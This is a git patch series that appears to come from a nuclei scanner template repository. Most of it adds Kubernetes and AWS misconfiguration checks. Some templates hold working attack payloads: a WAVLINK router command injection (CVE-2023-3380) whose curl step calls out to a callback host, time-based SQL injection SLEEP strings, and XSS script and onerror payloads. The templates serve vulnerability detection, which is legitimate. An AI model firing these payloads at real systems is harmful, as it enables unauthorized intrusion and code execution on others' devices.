+ dsl: + - response +# digest: 490a0046304402205488e0d1d8975da93c8879b2f4a090004db84f9a75618b7454a62edc8b0b6c2202207555edc45bffad32c1d89b0e68ebbd836a588de88a0e2f71f201fbda052d023e:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml new file mode 100644 index 0000000000..2f83e31698 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml @@ -0,0 +1,47 @@ +id: k8s-memory-requests-not-set + +info: + name: Memory requests not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing memory requests in Kubernetes Deployments, which can lead to inefficient scheduling and potential node resource exhaustion. + impact: | + Missing memory requests in Kubernetes Deployments can lead to inefficient pod scheduling, causing potential resource exhaustion on nodes. + remediation: Set memory requests for all containers in Kubernetes Deployments to ensure efficient pod scheduling and node resource utilization. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.requests && container.resources.requests.memory)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks memory requests.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100fe240dbf4c3fb7cc25858eae6a77ff3f3af8cce2dd2386358374f3bb179d1c2502210088357bf87098f8125c3a6038dde87ba3ac750d253e525b786f11013219119a7b:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml new file mode 100644 index 0000000000..6da198f43a --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml @@ -0,0 +1,51 @@ +id: minimize-added-capabilities + +info: + name: Minimize container added capabilities + author: princechaddha + severity: high + description: Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks. + impact: | + Containers with additional capabilities are granted more privileges than necessary, potentially allowing them to bypass intended security restrictions. This increases the risk of exploitation and unauthorized access. + remediation: | + Ensure that no unnecessary capabilities are added to containers within Kubernetes Deployments. Use security contexts to define the minimum necessary privileges. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + for (const container of deployment.spec.template.spec.containers) { + if (container.securityContext && container.securityContext.capabilities && container.securityContext.capabilities.add && container.securityContext.capabilities.add.length > 0) { + let addedCaps = container.securityContext.capabilities.add.join(', '); + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' has added capabilities: ${addedCaps}.`); + Export(result); + } + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100a4752be32718d5e3bf67d19c2c12b73dd2ddd70a44dc46ce8684cc5a70231e26022100f5f8e9f911051eeb8a41db141b0b2511c798e6d9be50aeef740011123d239ce6:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-privileged-container.yaml b/cloud/kubernetes/deployments/k8s-privileged-container.yaml new file mode 100644 index 0000000000..f1a401bf82 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-privileged-container.yaml @@ -0,0 +1,48 @@ +id: k8s-privileged-containers + +info: + name: Privileged Containers Found in Deployments + author: princechaddha + severity: critical + description: Checks for containers running in privileged mode within Kubernetes Deployments, which can pose significant security risks. + impact: | + Running containers in privileged mode grants them access to host resources and could lead to security breaches if the container is compromised. + remediation: | + Ensure that no container in Kubernetes Deployments runs in privileged mode. Modify the security context for each container to set `privileged: false`. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.spec.template.spec.containers.some(container => container.securityContext && container.securityContext.privileged)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is running one or more containers in privileged mode.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100f896dc71c39119ecfd505a21a22dfcec6e06896f4d4b528cec13cf998181dd3902203458b94c2d0bf33603b64f5aa503123505a983941b01b9d0aada0b8985666044:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml new file mode 100644 index 0000000000..de141bb4dc --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml @@ -0,0 +1,48 @@ +id: k8s-readiness-probe-not-set + +info: + name: Readiness Probes not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing readiness probes in Kubernetes Deployments, which can lead to traffic being sent to unready containers + impact: | + Not configuring readiness probes in Kubernetes Deployments can result in the routing of traffic to containers that are not ready to handle requests, leading to potential downtime or degraded performance. + remediation: | + Define readiness probes in all containers within your Kubernetes Deployments to ensure that traffic is only routed to containers that are fully prepared to handle it. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.readinessProbe)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks readiness probes.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450220592b68587cbae5ddf8d0c03554b81c57008a3878d45b2e878666aae7661e886d022100a8bffd45d8dcf071df20071daf0542bf6bbc9424e86c2aa38c522d7b10c6be3b:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml new file mode 100644 index 0000000000..65f2b0b327 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml @@ -0,0 +1,48 @@ +id: k8s-root-container-admission + +info: + name: Minimize the admission of root containers + author: princechaddha + severity: critical + description: Checks if any Kubernetes Deployments admit containers that run as root, which can pose a significant security risk. + impact: | + Allowing containers to run as root can lead to privilege escalation and unauthorized access to host resources, significantly compromising the security of the cluster. + remediation: | + Configure security contexts for all pods to run containers with a non-root user. Use Pod Security Policies or OPA/Gatekeeper to enforce these configurations. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups + tags: cloud,devops,kubernetes,devsecops,deployments,k8s + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.spec.template.spec.containers.some(container => container.securityContext && container.securityContext.runAsUser === null)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' permits containers to run as root.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502200475eac5bae9aa7fe9c98e0a90aa3680da94db7a15515256680d16a9fa319f8d022100b70835b10aa49e8a2961b2d957e41cc8e37f64cd066f36e292eb681900c19133:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/kubernetes-code-env.yaml b/cloud/kubernetes/kubernetes-code-env.yaml new file mode 100644 index 0000000000..ffcff48ad9 --- /dev/null +++ b/cloud/kubernetes/kubernetes-code-env.yaml @@ -0,0 +1,31 @@ +id: kubernetes-code-env +info: + name: Kubernetes Cluster Validation + author: princechaddha + severity: info + description: | + Checks if kubernetes CLI is set up and all necessary tools are installed on the environment. + reference: + - https://kubernetes.io/ + tags: cloud,devops,kubernetes,k8s,kubernetes-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl version + + extractors: + - type: regex + internal: true + name: server_version + group: 1 + regex: + - 'Server Version:\s*(v[0-9]+\.[0-9]+\.[0-9]+)' + + - type: dsl + dsl: + - '"kubectl is successfully connected to the Kubernetes API Server Version: " + server_version' +# digest: 4a0a004730450220619359f90501cb0301a0a76aea235c33bf0d89d0295b92f754fedbadae743cad02210081662171da38b9b6cbeee60e25edb542f288457118bde3833e2ea4e784333f18:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml new file mode 100644 index 0000000000..e45a1030af --- /dev/null +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -0,0 +1,50 @@ +id: k8s-allow-privilege-escalation-set + +info: + name: Containers run with allowPrivilegeEscalation enabled + author: princechaddha + severity: critical + description: Checks for containers running with the allowPrivilegeEscalation flag enabled, which can increase security risks by allowing privileges to be escalated + impact: | + Enabling allowPrivilegeEscalation in container deployments can result in elevated privileges, potentially allowing attackers to gain further access to host resources. This poses significant security risks. + remediation: Ensure that the allowPrivilegeEscalation flag is set to false in all container configurations to minimize security risks + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + tags: cloud,devops,kubernetes,security,devsecops,containers + +flow: | + code(1); + for (let container of template.items) { + set("container", container) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.container); // container is now a JSON object with 'pod' and 'containers' + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.allowPrivilegeEscalation === true) { + let result = (`Container '${container.name}' in pod '${podData.pod}' running with allowPrivilegeEscalation enabled.`); + Export(result); + } + }); + + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022025dc0e9a5d93ac04821b70467991a867158ff37e94f154ac26b67c9ebfaf6bdd02210094dde6b68d08983ae386767c31909fb6aa2a8edc5f257b81309eda1d5b0b0bb9:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml new file mode 100644 index 0000000000..6384676d21 --- /dev/null +++ b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml @@ -0,0 +1,47 @@ +id: k8s-containers-share-host-ipc + +info: + name: Containers sharing host IPC namespace + author: princechaddha + severity: critical + description: Checks if any containers in Kubernetes Pods are configured to share the host's IPC namespace, which can lead to security risks. + impact: | + Sharing the host's IPC namespace allows containers to access data across all containers on the same host, posing potential security risks. + remediation: Ensure that no container in Kubernetes Pods is set to share the host IPC namespace. Configure 'spec.hostIPC' to 'false' for all pods to isolate IPC namespaces. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + tags: cloud,devops,kubernetes,k8s,devsecops,pods + +flow: | + code(1); + for (let pod of template.items) { + set("pod",pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostIPC) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is configured to share the host IPC namespace.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100a9730fb29a79c4eb4576ddb1000e7a07cce3aa571fc20f8985265f114f5072ad02207a866c1c532b29932da349c0e29fb008675438fb327c0dab1620893ccf009ff7:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml new file mode 100644 index 0000000000..60922965d0 --- /dev/null +++ b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml @@ -0,0 +1,47 @@ +id: k8s-host-pid-namespace-sharing + +info: + name: Host PID Namespace Sharing + author: princechaddha + severity: critical + description: Checks if containers in Kubernetes pods share the host's process ID namespace, which can pose a security risk. + impact: | + Sharing the host's PID namespace allows processes within the pod to view all of the processes on the host, potentially leading to privilege escalation and other security vulnerabilities. + remediation: | + Ensure that the 'hostPID' field is set to 'false' in Kubernetes Pod specifications to prevent containers from sharing the host's PID namespace. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces + tags: cloud,devops,kubernetes,k8s,devsecops,pods + +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostPID) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is sharing the host's PID namespace.`); + Export(result); + } + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100cdb3127b175107266c1409c70c3318a851490bf743f92923077b0249b9090cdd022100d3371724828565a28e7003ecf9902e3deb93c074444b7a9b2d34c235f454032c:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-fs.yaml b/cloud/kubernetes/pods/k8s-readonly-fs.yaml new file mode 100644 index 0000000000..2148601878 --- /dev/null +++ b/cloud/kubernetes/pods/k8s-readonly-fs.yaml @@ -0,0 +1,46 @@ +id: k8s-readonly-fs + +info: + name: Enforce Read-Only Filesystem for Containers + author: princechaddha + severity: critical + description: Checks for containers that do not use a read-only filesystem, which can prevent malicious write operations at runtime + impact: | + Not using a read-only filesystem can expose containers to risks of malicious modifications at runtime, compromising the container's integrity and security. + remediation: Configure containers to use read-only filesystems where possible to enhance security and minimize risk of unauthorized data modification + reference: + - https://kubernetes.io/docs/concepts/storage/volumes/#mount-propagation + tags: cloud,devops,kubernetes,k8s,devsecops,pods + +flow: | + code(1); + for (let container of template.items) { + set("container", container) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[].spec.containers[]' + +javascript: + - code: | + container = JSON.parse(template.container); + if (!container.securityContext || container.securityContext.readOnlyRootFilesystem !== true) { + let result = (`Container '${container.name}' in pod '${container.metadata.name}' in namespace '${container.metadata.namespace}' does not use a read-only filesystem.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response From 11445ea3e469febc4f3cc2bd3cdb1e937f62b8af Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 26 May 2024 08:58:13 +0400 Subject: [PATCH 0032/1841] =?UTF-8?q?fixed=20lint=20error=20=F0=9F=9B=A0?= =?UTF-8?q?=EF=B8=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml | 2 +- cloud/kubernetes/pods/k8s-readonly-fs.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml index 6384676d21..d33d13d18a 100644 --- a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml +++ b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml @@ -7,7 +7,7 @@ info: description: Checks if any containers in Kubernetes Pods are configured to share the host's IPC namespace, which can lead to security risks. impact: | Sharing the host's IPC namespace allows containers to access data across all containers on the same host, posing potential security risks. - remediation: Ensure that no container in Kubernetes Pods is set to share the host IPC namespace. Configure 'spec.hostIPC' to 'false' for all pods to isolate IPC namespaces. + remediation: Ensure that no container in Kubernetes Pods is set to share the host IPC namespace. Configure 'spec.hostIPC' to 'false' for all pods to isolate IPC namespaces. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ tags: cloud,devops,kubernetes,k8s,devsecops,pods diff --git a/cloud/kubernetes/pods/k8s-readonly-fs.yaml b/cloud/kubernetes/pods/k8s-readonly-fs.yaml index 2148601878..947aa40f31 100644 --- a/cloud/kubernetes/pods/k8s-readonly-fs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-fs.yaml @@ -7,7 +7,7 @@ info: description: Checks for containers that do not use a read-only filesystem, which can prevent malicious write operations at runtime impact: | Not using a read-only filesystem can expose containers to risks of malicious modifications at runtime, compromising the container's integrity and security. - remediation: Configure containers to use read-only filesystems where possible to enhance security and minimize risk of unauthorized data modification + remediation: Configure containers to use read-only filesystems where possible to enhance security and minimize risk of unauthorized data modification reference: - https://kubernetes.io/docs/concepts/storage/volumes/#mount-propagation tags: cloud,devops,kubernetes,k8s,devsecops,pods From c92efd11f524d68d05d1217d613ad38b7e26eeb9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 May 2024 16:53:38 +0530 Subject: [PATCH 0033/1841] Create CVE-2023-3380.yaml --- http/cves/2023/CVE-2023-3380.yaml | 60 +++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3380.yaml diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml new file mode 100644 index 0000000000..6d59b87411 --- /dev/null +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -0,0 +1,60 @@ +id: CVE-2023-3380 + +info: + name: WAVLINK WN579X3 - Remote Command Execution + author: pussycat0x + severity: critical + description: | + Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi. + reference: + - https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md + - https://vuldb.com/?ctiid.232236 + - https://vuldb.com/?id.232236 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3380 + cwe-id: CWE-74 + epss-score: 0.00064 + epss-percentile: 0.26519 + cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:* + metadata: + vendor: wavlink + product: wn579x3_firmware + shodan-query: http.html:"Wavlink" + tags: cve,cve2023,wavlink + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "images/WAVLINK-logo.png" + - "Wi-Fi APP Login" + condition: and + + - raw: + - | + POST /cgi-bin/adm.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ping.shtml?r=32723 + + page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 200 From 06c7275753d19d0f2302f03190f3c2cbc6a0b925 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 May 2024 22:07:10 +0530 Subject: [PATCH 0034/1841] lint -fix --- http/cves/2023/CVE-2023-3380.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index 6d59b87411..e78e68b920 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -22,7 +22,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" - tags: cve,cve2023,wavlink + tags: cve,cve2023,wavlink flow: http(1) && http(2) @@ -46,7 +46,7 @@ http: Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/ping.shtml?r=32723 - page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} + page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} matchers-condition: and matchers: From f7993e9ccfdd4affc9ad51a337518e72d6d23df8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jun 2024 12:56:10 +0530 Subject: [PATCH 0035/1841] lint fix --- .../vulnerabilities/sqli/time-based-sqli.yaml | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 16d2d75568..3fd64ce568 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -3,31 +3,34 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection author: 0xKayala - severity: Critical - description: This Template detects time-based Blind SQL Injection vulnerability + severity: critical + description: | + This Template detects time-based Blind SQL Injection vulnerability tags: sqli,dast,time http: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}" + payloads: injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" fuzzing: - part: query type: replace mode: single fuzz: - - "{{injection}}" + - "{{injection}}" + stop-at-first-match: true matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" + - type: dsl + dsl: + - "duration>=7 && duration <=16" From 6c4cc54f698a2f0a23948c8af7c730b2158bdbb0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 12:51:31 +0530 Subject: [PATCH 0036/1841] lint fix --- dast/vulnerabilities/xss/reflected-xss.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index 8f2bef16a9..c23a475947 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -1,8 +1,8 @@ id: reflected-xss info: - name: Reflected Cross Site Scripting - author: pdteam, 0xKayala + name: Reflected Cross-Site Scripting + author: pdteam,0xKayala severity: medium tags: xss,rxss,dast @@ -26,7 +26,7 @@ http: - "" - "" - "'>" - - "'\/>" + - "'\">" - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o" fuzzing: From ea8e3cd0c5effbd0fe3a314ea12265e10938d0d0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 14:24:23 +0530 Subject: [PATCH 0037/1841] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index d822ac3f4b..cea5a8cd54 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -20,7 +20,6 @@ info: epss-score: 0.00045 epss-percentile: 0.14706 metadata: - verified: true max-request: 1 vendor: cacti product: cacti From 1847bc8aadf509a59bb126ada7383baaa9ee4875 Mon Sep 17 00:00:00 2001 From: Ritesh Gohil Date: Fri, 7 Jun 2024 06:01:02 -0400 Subject: [PATCH 0038/1841] Added SNS Topic Subscription access publicly Template --- sns-topic-subscribe-public-accessible.yaml | 68 ++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 sns-topic-subscribe-public-accessible.yaml diff --git a/sns-topic-subscribe-public-accessible.yaml b/sns-topic-subscribe-public-accessible.yaml new file mode 100644 index 0000000000..d8162afebf --- /dev/null +++ b/sns-topic-subscribe-public-accessible.yaml @@ -0,0 +1,68 @@ +id: sns-topic-subscribe-public-access + +info: + name: Public Subscription Access of SNS Topics via Policy + author: Ritesh_Gohil(#L4stPL4Y3R) + severity: High + description: | + This template checks if Amazon SNS topics are configured to allow public subscription access via topic policies. + reference: + - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html + tags: cloud, devops, aws, amazon, sns, aws-cloud-config + +flow: | + code(1) + for (let topicArn of iterate(template.topics)) { + set("topicArn", topicArn) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws sns list-topics --query 'Topics[*].TopicArn' + + extractors: + - type: json + internal: true + name: topics + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws sns get-topic-attributes --topic-arn $topicArn --query Attributes.Policy --output text + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Effect":"Allow"' + + - type: word + part: body + words: + - '"Principal":{"AWS":"*"}' + + - type: word + part: body + words: + - '"Action":"SNS:Subscribe"' + + - type: regex + part: body + negative: true + regex: + - '"Condition"' + + extractors: + - type: dsl + dsl: + - '"The SNS topic " + topicArn + " allows public subscription via Policy"' +# digest: 4a0a0047304502205fb7f0c9b0626cc145370d50015cadeeda16e73469baaab959fc8c76c120a57b02210096912a33733194302dcee8747a398dd06c425ceac11d7348bd8c08ca4b0184de:f37bf26b30a8e29c9db6a85589544950 \ No newline at end of file From 768d3d5d1608c290f312d9e6a9001dbb374727d2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jun 2024 15:49:17 +0530 Subject: [PATCH 0039/1841] Create CVE-2023-38194.yaml --- http/cves/2023/CVE-2023-38194.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2023/CVE-2023-38194.yaml diff --git a/http/cves/2023/CVE-2023-38194.yaml b/http/cves/2023/CVE-2023-38194.yaml new file mode 100644 index 0000000000..1641b0cac6 --- /dev/null +++ b/http/cves/2023/CVE-2023-38194.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-38194 + +info: + name: SuperWebMailer - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or account compromise. + remediation: | + Implement input validation and output encoding to prevent XSS attacks in the SuperWebMailer keepalive.php script. + reference: + - https://herolab.usd.de/security-advisories/usd-2023-0013/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-38194 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-38194 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.00.0.01710:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: superwebmailer + product: superwebmailer + shodan-query: title:"SuperWebMailer" + tags: cve,cve2023,superwebmailer,xss + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085" + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "")' + - 'contains(tolower(body_1), "superwebmailer")' + - 'contains(header_2, "text/html")' + - 'status_code_2 == 200' + condition: and From c9e461dd10f1fa118a0e8ae593d3d9b2c9687516 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jun 2024 16:16:45 +0530 Subject: [PATCH 0040/1841] Create CVE-2023-43472.yaml --- 